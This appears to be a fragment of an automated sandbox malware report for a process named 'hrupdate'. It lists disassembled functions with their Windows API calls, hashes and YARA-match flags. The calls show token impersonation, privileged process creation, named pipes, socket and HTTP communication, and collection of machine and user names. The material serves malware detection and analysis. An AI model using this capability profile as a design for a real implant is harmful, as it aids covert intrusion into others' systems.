                                                                • GetLastError.KERNEL32 ref: 04FD33F5
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,04FC80F0,?,04FC7F09,04FC80F0,?,00000400), ref: 04FC664B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,04FC80F0,04FC7F09,?,04FC7F09,04FC80F0,?,00000400,?,?,?,?,04FC80F0), ref: 04FC6664
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                  • Part of subcall function 04FC4A19: _vwprintf.LIBCMT ref: 04FC4A23
                                                                  • Part of subcall function 04FC4A19: _vswprintf_s.LIBCMT ref: 04FC4A47
                                                                  • Part of subcall function 04FC4A58: _memset.LIBCMT ref: 04FC4A66
                                                                • ImpersonateLoggedOnUser.ADVAPI32 ref: 04FD340F
                                                                • GetLastError.KERNEL32 ref: 04FD3419
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$ByteCharErrorLastMultiUserWide$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
                                                                • String ID:
                                                                • API String ID: 744593125-0
                                                                • Opcode ID: a118b4ac4a1cea09f6f3f2650337dad2a5ae1efef9dcb0e9e2dc2c989db29bf0
                                                                • Instruction ID: 24878f33e2a1472535547e562a66f29922c0117c95a262e6e9c277435a23e302
                                                                • Opcode Fuzzy Hash: a118b4ac4a1cea09f6f3f2650337dad2a5ae1efef9dcb0e9e2dc2c989db29bf0
                                                                • Instruction Fuzzy Hash: 16318671900309BFEF016FA1ED4BEAE3F6DEB04358F145429FA04A6191EF39A512DB61
                                                                Function 04FCBBF1 Relevance: 6.1, APIs: 4, Instructions: 63sleepnetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCBC00
                                                                • Sleep.KERNEL32(000003E8), ref: 04FCBC50
                                                                • GetTickCount.KERNEL32 ref: 04FCBC56
                                                                • WSAGetLastError.WS2_32 ref: 04FCBC5C
                                                                  • Part of subcall function 04FCBBAB: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCBBBD
                                                                  • Part of subcall function 04FCB387: _memset.LIBCMT ref: 04FCB3A8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$ErrorLastSleep_memsetioctlsocket
                                                                • String ID:
                                                                • API String ID: 3301373915-0
                                                                • Opcode ID: c938ac3300beb77ae71d324c76753f611069e993e2355c853d404c1ae4cd89ce
                                                                • Instruction ID: 07211530dc7831ff3d3c10d9c361a4e57fa603370a7c8c088fb6b4467303b494
                                                                • Opcode Fuzzy Hash: c938ac3300beb77ae71d324c76753f611069e993e2355c853d404c1ae4cd89ce
                                                                • Instruction Fuzzy Hash: FC11E977C0411B6FEB01BBB4BE829AE776DDF44268F14002BE610A6090ED31B9875795
                                                                Function 04FC77F5 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 04FC7851
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04FC7874
                                                                • GetLastError.KERNEL32 ref: 04FC787E
                                                                  • Part of subcall function 04FC4A19: _vwprintf.LIBCMT ref: 04FC4A23
                                                                  • Part of subcall function 04FC4A19: _vswprintf_s.LIBCMT ref: 04FC4A47
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                                                                • String ID:
                                                                • API String ID: 2004037343-0
                                                                • Opcode ID: ffa6355c8a5d418c4743b5d09e4c974122d0b38166cbf439f52f83b0ab706163
                                                                • Instruction ID: 9740372a23e2209f81e06398601b26f69dda6cb9eb499fe4a3c16d091a920853
                                                                • Opcode Fuzzy Hash: ffa6355c8a5d418c4743b5d09e4c974122d0b38166cbf439f52f83b0ab706163
                                                                • Instruction Fuzzy Hash: 9811607290021ABFEB10AFA4DE459EFBBBCEF48654F100429FA04F6050D631EE05CAB1
                                                                Function 04FD359B Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,74DF2E90,?,?,?,04FCBE90), ref: 04FD35CE
                                                                • CheckTokenMembership.ADVAPI32(00000000,?,04FCBE90,?,?,?,04FCBE90), ref: 04FD35E3
                                                                • FreeSid.ADVAPI32(?,?,?,?,04FCBE90), ref: 04FD35F3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                • Opcode ID: 6b549868339aac37b68b3ccfe9f06e2782d13e48a1772893665d475d42082f57
                                                                • Instruction ID: c239f5f7df5b3ba6365337db489f16eba210ad8757e7e9f8c012ac46cda6d796
                                                                • Opcode Fuzzy Hash: 6b549868339aac37b68b3ccfe9f06e2782d13e48a1772893665d475d42082f57
                                                                • Instruction Fuzzy Hash: 9301197694528CFFDB01DBE89985AEEBF7CEF14204F44449AAA01A3142D6709B08DB25
                                                                Function 04FEC4E0 Relevance: 3.1, Strings: 2, Instructions: 612COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $<
                                                                • API String ID: 0-428540627
                                                                • Opcode ID: f97227e4bf5b4cbf7ce50ccc0aa0db7431b1fcbf39c9353cba1f3496891c78ff
                                                                • Instruction ID: 4ff21518d02b1e632d32223480f3cf89b94e80b0a0daedde2ab8f093e610207b
                                                                • Opcode Fuzzy Hash: f97227e4bf5b4cbf7ce50ccc0aa0db7431b1fcbf39c9353cba1f3496891c78ff
                                                                • Instruction Fuzzy Hash: 8F52E375E001599FDB08CFA9D491AADBBF1EF4D301F14C16AE865AB342C238E951CFA4
                                                                Function 04FC78A5 Relevance: 1.5, APIs: 1, Instructions: 38pipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000004,00000002,00000000,00000000,00000000,00000000), ref: 04FC78F9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0
                                                                • Opcode ID: 0670a894ed5281515b209fea383c6660a17f251d577b12c4a1812cbb18f6d3fa
                                                                • Instruction ID: 5a5cb4490b3c2d9eeafef3159fed189b6e18a3df9c612def079280b6e75cf1cc
                                                                • Opcode Fuzzy Hash: 0670a894ed5281515b209fea383c6660a17f251d577b12c4a1812cbb18f6d3fa
                                                                • Instruction Fuzzy Hash: F3F0C8B150030EAFE720AF74BD86A5A7FDCE700368F101764B2A5D10D1E6B85E568E50
                                                                Function 00B037E2 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000037EE,00B02EF1), ref: 00B037E7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 244a63662d12ba9f93124cc6900ae7a8271731fb2fb3ccffa0b55bc7521a81dc
                                                                • Instruction ID: 75784910e12a5ada53833c94bb0e83cf94bb44811f5f31bc2f4ef0188396f828
                                                                • Opcode Fuzzy Hash: 244a63662d12ba9f93124cc6900ae7a8271731fb2fb3ccffa0b55bc7521a81dc
                                                                • Instruction Fuzzy Hash:
                                                                Function 030DCA68 Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                                                • Instruction ID: 6a36877d4aeb547798fee2e1c34d2203a4eb675bf89196d74d04a41fd052457f
                                                                • Opcode Fuzzy Hash: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                                                • Instruction Fuzzy Hash: 9F519F74E0121A9FCB44CF98C590AEEBBF1FF88314F248599D815AB355D335AA41CFA4
                                                                Function 030DBE95 Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                                                • Instruction ID: ed8bd191b2dbe9833deb3ba2ed8ec29a0f416031457cecd4690a8b4cd9fc1e9f
                                                                • Opcode Fuzzy Hash: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                                                • Instruction Fuzzy Hash: 85519E74E012199FCB48CF98C490AAEFBF1FF88304F248599D915AB355D335AA41CFA4
                                                                Function 04FCC902 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 210networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • htonl.WS2_32(04FC389E), ref: 04FCC93C
                                                                • select.WS2_32(00000000,?,?,?,?), ref: 04FCC9A0
                                                                • __WSAFDIsSet.WS2_32(34E85900,?), ref: 04FCC9BC
                                                                • accept.WS2_32(34E85900,00000000,00000000), ref: 04FCC9D1
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCC9E4
                                                                  • Part of subcall function 04FCC308: _malloc.LIBCMT ref: 04FCC30F
                                                                  • Part of subcall function 04FCC308: GetTickCount.KERNEL32 ref: 04FCC32F
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                  • Part of subcall function 04FC490F: htonl.WS2_32(00000000), ref: 04FC4915
                                                                  • Part of subcall function 04FC4A58: _memset.LIBCMT ref: 04FC4A66
                                                                • __WSAFDIsSet.WS2_32(34E85900,?), ref: 04FCCA71
                                                                • accept.WS2_32(34E85900,00000000,00000000), ref: 04FCCA83
                                                                • closesocket.WS2_32(04FC389E), ref: 04FCCB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
                                                                • String ID: d
                                                                • API String ID: 4083423528-2564639436
                                                                • Opcode ID: d33ebdcfb46cff34d401c2e21eea5fe94381b35a7376f9746d9a5bf655abd26a
                                                                • Instruction ID: 5e722a92122be3faeb7eb907090cc0748561eb85873d4109141d3a3197c64443
                                                                • Opcode Fuzzy Hash: d33ebdcfb46cff34d401c2e21eea5fe94381b35a7376f9746d9a5bf655abd26a
                                                                • Instruction Fuzzy Hash: C2713DB1C0064AAFEB21DFA5CE44EAFB7B8EF44304F1045AEE519E3150E731BA469B51
                                                                Function 04FC5DB9 Relevance: 19.7, APIs: 13, Instructions: 196networksleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC5DE4
                                                                • _memset.LIBCMT ref: 04FC5DF9
                                                                • __snprintf.LIBCMT ref: 04FC5E65
                                                                • _memset.LIBCMT ref: 04FC5E73
                                                                • __snprintf.LIBCMT ref: 04FC5E8F
                                                                • __snprintf.LIBCMT ref: 04FC5EAE
                                                                • __snprintf.LIBCMT ref: 04FC5F4C
                                                                • __snprintf.LIBCMT ref: 04FC5F63
                                                                • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,04FF656C,05009668), ref: 04FC5FA0
                                                                • HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 04FC5FC9
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC5FDB
                                                                • Sleep.KERNEL32(000001F4), ref: 04FC5FE2
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC5FF3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __snprintf$_memset$CloseHandleHttpInternetRequest$OpenSendSleep
                                                                • String ID:
                                                                • API String ID: 3375730287-0
                                                                • Opcode ID: 475278b11340d9e897ed8a287a7b89b2bbe2ada84872900855190bf838db586f
                                                                • Instruction ID: 64bfa425a5b490b74f816d5ab5e4fde26fb1453d85e68d4dd2768ded416548fe
                                                                • Opcode Fuzzy Hash: 475278b11340d9e897ed8a287a7b89b2bbe2ada84872900855190bf838db586f
                                                                • Instruction Fuzzy Hash: AD6195B2D00219BFEB11AFA4DD44DEE7BBDEF04304F0444A5E645A3112DB35BA4ACB65
                                                                Function 04FCC701 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCC712
                                                                • select.WS2_32(00000000,00000000,?,?,00000000), ref: 04FCC75D
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC76D
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC780
                                                                • GetTickCount.KERNEL32 ref: 04FCC789
                                                                • gethostbyname.WS2_32(?), ref: 04FCC794
                                                                • htons.WS2_32(?), ref: 04FCC7A7
                                                                • inet_addr.WS2_32(?), ref: 04FCC7B3
                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 04FCC7CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                                • String ID: d
                                                                • API String ID: 1257931466-2564639436
                                                                • Opcode ID: 212084c089c06191fa5885eab956cf6445178b77d8e9951ed821ce3bd5ff6cee
                                                                • Instruction ID: d46130fe50433e1c36246819d7b250a67a713ac96eda0241677cb68bbed1662c
                                                                • Opcode Fuzzy Hash: 212084c089c06191fa5885eab956cf6445178b77d8e9951ed821ce3bd5ff6cee
                                                                • Instruction Fuzzy Hash: E521537294025EAFEF119FA0ED45BEF7BB9EF08300F1001A6E908E6151DB75EA518F91
                                                                Function 04FD0283 Relevance: 16.8, APIs: 11, Instructions: 289COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                • _memset.LIBCMT ref: 04FD02EC
                                                                  • Part of subcall function 04FD075D: _memset.LIBCMT ref: 04FD0859
                                                                • _malloc.LIBCMT ref: 04FD02FA
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _memset.LIBCMT ref: 04FD030C
                                                                  • Part of subcall function 04FD3B98: _malloc.LIBCMT ref: 04FD3BBF
                                                                  • Part of subcall function 04FD3B98: _memset.LIBCMT ref: 04FD3BED
                                                                  • Part of subcall function 04FD0871: _memset.LIBCMT ref: 04FD0950
                                                                • _malloc.LIBCMT ref: 04FD032F
                                                                • _memset.LIBCMT ref: 04FD0341
                                                                  • Part of subcall function 04FD3B98: _realloc.LIBCMT ref: 04FD3BCE
                                                                • htonl.WS2_32(00000000), ref: 04FD0372
                                                                • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 04FD03DB
                                                                • GetComputerNameA.KERNEL32(04FCE6FF,?), ref: 04FD0408
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 04FD0435
                                                                  • Part of subcall function 04FC6388: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 04FC63AC
                                                                • _malloc.LIBCMT ref: 04FD0504
                                                                • _memset.LIBCMT ref: 04FD0591
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_malloc$Name$Computer$AllocateHeapSocketUser_reallochtonl
                                                                • String ID:
                                                                • API String ID: 2958771099-0
                                                                • Opcode ID: 7f05ed4a2b8daa947825c39a7fa45f605fa59cbd42ac85f7459a0f5c438a882c
                                                                • Instruction ID: 559658f127321683c4c09cbe77142355a157dedbbe730f4308f605b3a45b368c
                                                                • Opcode Fuzzy Hash: 7f05ed4a2b8daa947825c39a7fa45f605fa59cbd42ac85f7459a0f5c438a882c
                                                                • Instruction Fuzzy Hash: 89910872D40308BFEB20ABA59C85FAF77AAEF44719F14401AF508AB181EE75F5438761
                                                                Function 04FC7E95 Relevance: 16.7, APIs: 11, Instructions: 184processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC7EC3
                                                                • _memset.LIBCMT ref: 04FC7EDF
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,04FC80F0,?,04FC7F09,04FC80F0,?,00000400), ref: 04FC664B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,04FC80F0,04FC7F09,?,04FC7F09,04FC80F0,?,00000400,?,?,?,?,04FC80F0), ref: 04FC6664
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,04FC80F0,04FCD106,?,?,04FCD106,?), ref: 04FC7F29
                                                                • GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,04FC80F0,04FCD106,?,?,04FCD106,?), ref: 04FC7F38
                                                                • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C2E8296A,83FFFFD9), ref: 04FC7F6B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
                                                                • String ID:
                                                                • API String ID: 2486443368-0
                                                                • Opcode ID: 5e5f180c0d30a5aee155c3231ec10f6a520349795789859b2333d30cc8ca512a
                                                                • Instruction ID: 9e06dadd6b03c70eb393c5af7114a85fbe484b3f45111a2cd98acea5bd21c50d
                                                                • Opcode Fuzzy Hash: 5e5f180c0d30a5aee155c3231ec10f6a520349795789859b2333d30cc8ca512a
                                                                • Instruction Fuzzy Hash: 1651C472504347AFE721AF64DD84EAA77EDEF84304F14082DE945C3251EA35B90ACBA6
                                                                Function 04FD3268 Relevance: 16.6, APIs: 11, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • htonl.WS2_32 ref: 04FD3290
                                                                • htonl.WS2_32(?), ref: 04FD32A0
                                                                • GetLastError.KERNEL32 ref: 04FD32CC
                                                                • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 04FD32F0
                                                                • GetLastError.KERNEL32 ref: 04FD32FA
                                                                • ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 04FD3319
                                                                • GetLastError.KERNEL32 ref: 04FD331F
                                                                • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,05009F5C), ref: 04FD333E
                                                                • GetLastError.KERNEL32 ref: 04FD3348
                                                                • ImpersonateLoggedOnUser.ADVAPI32 ref: 04FD335A
                                                                • GetLastError.KERNEL32 ref: 04FD3360
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$ImpersonateLoggedTokenUserhtonl$DuplicateOpenProcess
                                                                • String ID:
                                                                • API String ID: 332438066-0
                                                                • Opcode ID: 1aceade7dba03570b7a6ee7a928be9562e5f2d1506a74dbb49a961a7ad11228c
                                                                • Instruction ID: 728e0d00e861a214104077eb90e1d7d855f8d3dcbba75bffc36e4cfe964d394b
                                                                • Opcode Fuzzy Hash: 1aceade7dba03570b7a6ee7a928be9562e5f2d1506a74dbb49a961a7ad11228c
                                                                • Instruction Fuzzy Hash: B941B671D04209BFFB215F60EC49FBE3B6EEF00749F184055FE0595041EB7569469A62
                                                                Function 04FCB74E Relevance: 16.6, APIs: 11, Instructions: 90pipesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCB75D
                                                                • GetTickCount.KERNEL32 ref: 04FCB767
                                                                • GetLastError.KERNEL32 ref: 04FCB7C1
                                                                  • Part of subcall function 04FD2BBA: _memset.LIBCMT ref: 04FD2C43
                                                                • GetLastError.KERNEL32 ref: 04FCB783
                                                                • WaitNamedPipeA.KERNEL32(?,00002710), ref: 04FCB798
                                                                  • Part of subcall function 04FCB387: _memset.LIBCMT ref: 04FCB3A8
                                                                • Sleep.KERNEL32(000003E8), ref: 04FCB7A5
                                                                • GetTickCount.KERNEL32 ref: 04FCB7AB
                                                                • GetLastError.KERNEL32 ref: 04FCB7D1
                                                                • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 04FCB7EE
                                                                • GetLastError.KERNEL32 ref: 04FCB7F8
                                                                • DisconnectNamedPipe.KERNEL32(?), ref: 04FCB832
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CountNamedPipeTick$_memset$DisconnectHandleSleepStateWait
                                                                • String ID:
                                                                • API String ID: 3382687554-0
                                                                • Opcode ID: b8b7320ae62a04bf73cb54710d82d5c9ff6cf7a9ee4bf468e6cd89a108b5ccf3
                                                                • Instruction ID: 63ccd69abcb378d0126957711cc3b8f21d51293dda282b740e88afdce01857c9
                                                                • Opcode Fuzzy Hash: b8b7320ae62a04bf73cb54710d82d5c9ff6cf7a9ee4bf468e6cd89a108b5ccf3
                                                                • Instruction Fuzzy Hash: 4F210A36A4421A6FEB046FB4FEC7B6D765CDF04764F24052AFA05E60C0EE65788387A1
                                                                Function 04FCC63B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networksleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCC64C
                                                                • select.WS2_32(00000000,00000000,?,?,00000000), ref: 04FCC69A
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC6AA
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC6BD
                                                                • send.WS2_32(?,00000000,?,00000000), ref: 04FCC6D1
                                                                • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 04FCC6DB
                                                                • Sleep.KERNEL32(000003E8), ref: 04FCC6ED
                                                                • GetTickCount.KERNEL32 ref: 04FCC6F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$ErrorLastSleepselectsend
                                                                • String ID: d
                                                                • API String ID: 2152284305-2564639436
                                                                • Opcode ID: 5ba32616b8b850b173a9f4b3d7a941ea2a7a955f7bd1d2678686280c7c35516c
                                                                • Instruction ID: dda5c8c64bce6f6e82517b278dfac602686edbe66ab664647c6b8ff518eda839
                                                                • Opcode Fuzzy Hash: 5ba32616b8b850b173a9f4b3d7a941ea2a7a955f7bd1d2678686280c7c35516c
                                                                • Instruction Fuzzy Hash: 2A115471D4025DAFDB119F60ED84BE97778EF04310F1041A6E60CE2190DBB4AE929FD0
                                                                Function 04FCC530 Relevance: 13.6, APIs: 9, Instructions: 101networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • htonl.WS2_32 ref: 04FCC54F
                                                                • htons.WS2_32(00000000), ref: 04FCC560
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FCC599
                                                                • closesocket.WS2_32(00000000), ref: 04FCC5A8
                                                                • gethostbyname.WS2_32(00000000), ref: 04FCC5C6
                                                                • htons.WS2_32(?), ref: 04FCC5F2
                                                                • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 04FCC605
                                                                • connect.WS2_32(00000000,?,00000010), ref: 04FCC616
                                                                • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 04FCC61F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                                • String ID:
                                                                • API String ID: 3339321253-0
                                                                • Opcode ID: 728be2ab2fab45c6268afe685c09c130ac552792652e7f39754e14affc0ab7cc
                                                                • Instruction ID: 7ea3aa6b698e8ca6e6f1c6c643c110c211282276e3e6697deb074fa0f1ad6c74
                                                                • Opcode Fuzzy Hash: 728be2ab2fab45c6268afe685c09c130ac552792652e7f39754e14affc0ab7cc
                                                                • Instruction Fuzzy Hash: 6231FC72D002596FEB21EBE5DD44EBE77ACDF44319F10056AF508E7180F634A9028765
